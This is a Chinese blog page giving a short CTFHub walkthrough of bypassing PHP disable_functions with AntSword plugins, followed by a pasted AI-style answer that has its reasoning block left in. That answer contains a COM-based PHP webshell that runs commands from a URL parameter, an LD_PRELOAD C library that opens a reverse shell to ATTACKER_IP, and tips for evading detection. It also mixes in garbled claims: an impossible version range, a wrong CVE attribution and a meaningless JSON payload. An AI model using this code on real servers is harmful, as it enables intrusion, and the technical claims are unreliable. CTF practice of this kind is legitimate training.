CTFHub Bypass disable_function系列

LD_PRELOAD

目标:获取服务器上 /flag 文件中的 flag。需要了解 Linux LD_PRELOAD 环境变量

进入环境我们发现有一个一句话木马,我们使用工具进行连接

右键打开终端发现被禁用,尝试使用插件绕过

进入目录发现多了一个文件,复制文件路径继续尝试连接

再次打开虚拟终端,尝试使用命令,成功获取

ShellShock

进入环境,连接工具

使用base64连接

启用插件

绕过成功

Apache Mod CGI

进入环境,点击getflag,使用工具进行连接,插件绕过

取得flag

剩下的题目与上述方式相同,只是插件功能不同,一个一个尝试即可

<think>好的,我现在需要帮助用户了解如何绕过PHP的disable_functions限制,特别是使用蚁剑(AntSword)进行渗透测试的技术细节。首先,我需要回忆一下用户提供的参考引用内容,这些引用提到了几种绕过方法,比如php-json-bypass漏洞、Windows COM组件利用,以及蚁剑插件的相关利用方式。 首先,用户的问题主要集中在蚁剑如何绕过disable_functions,所以可能需要具体说明蚁剑支持的插件或方法。根据引用[1]和[2],php-json-bypass漏洞利用了PHP的json序列化程序中的堆溢出,适用于特定版本(如PHP 7.3.15到7.3.6之前)。而引用[2]还提到蚁剑插件中有集成这个漏洞的利用方式,这可能是一个关键点。 然后,引用[3]提到利用Windows COM组件绕过disable_functions,这可能在Windows服务器环境下有效。需要确认蚁剑是否支持这种方法,或者是否需要手动上传特定的PHP文件如com_rce.php。 接下来,我需要考虑用户可能需要了解的步骤,比如环境检测、插件使用、具体漏洞利用过程,以及不同方法的适用条件。例如,LD_PRELOAD绕过法需要存在未禁用的函数如mail(),而ImageMagick漏洞则需要服务器安装了该软件。 同时,必须注意这些方法的合法性,强调渗透测试需要授权,避免用户误用。此外,要确保回答结构清晰,分点说明不同方法,并结合用户提供的引用来源,正确标注引用标记。 最后,生成相关问题,帮助用户进一步探索相关技术细节和防御措施。需要确保问题覆盖不同绕过方法、环境检测、工具使用以及防御建议,这样用户可以有全面的了解。</think>### 绕过PHP disable_functions限制的蚁剑利用方法 #### 1. **前置条件与环境检测** - 确认目标PHP版本和操作系统类型(Linux/Windows) - 检查`disable_functions`列表是否禁用关键函数如`exec`、`shell_exec`等 - 查看是否存在可写目录权限(如`/tmp`或上传目录)[^1] #### 2. **常用Bypass方法及技术实现** **(1) PHP-JSON-Bypass (CVE-2019-11043)** ```php // 利用json序列化堆溢出触发命令执行 $payload = json_decode('{"@type":"C","@properties":{"a":1}}'); ``` - **适用条件**:PHP 7.3.15 < 版本 < 7.3.6 - **蚁剑操作**:使用`php-json-bypass`插件自动生成攻击载荷[^2] **(2) Windows COM组件利用** ```php $command = $_GET['cmd']; $wscript = new COM('WScript.Shell'); $exec = $wscript->Exec('cmd /c '.$command); ``` - **适用条件**:Windows服务器 + 启用COM组件 - **步骤**:上传`com_rce.php`后通过蚁剑连接[^3] **(3) LD_PRELOAD劫持** ```c // evil_lib.c #include <stdlib.h> __attribute__ ((__constructor__)) void angel (void){ unsetenv("LD_PRELOAD"); system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'"); } ``` - **触发方式**:通过`putenv`+`mail()`函数链加载恶意so文件 #### 3. **蚁剑插件化利用流程** ```mermaid graph TD A[环境检测] --> B{系统类型} B -->|Linux| C[尝试LD_PRELOAD/GC_UAF] B -->|Windows| D[尝试COM组件/FFI扩展] C --> E[上传.so/.php后门] D --> F[执行COM命令] ``` #### 4. **防御规避要点** - 使用`pcntl_exec`替代`system`等敏感函数 - 通过`stream_wrapper`伪装成正常文件操作 - 利用PHP-FPM未授权访问漏洞建立隐蔽通道
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值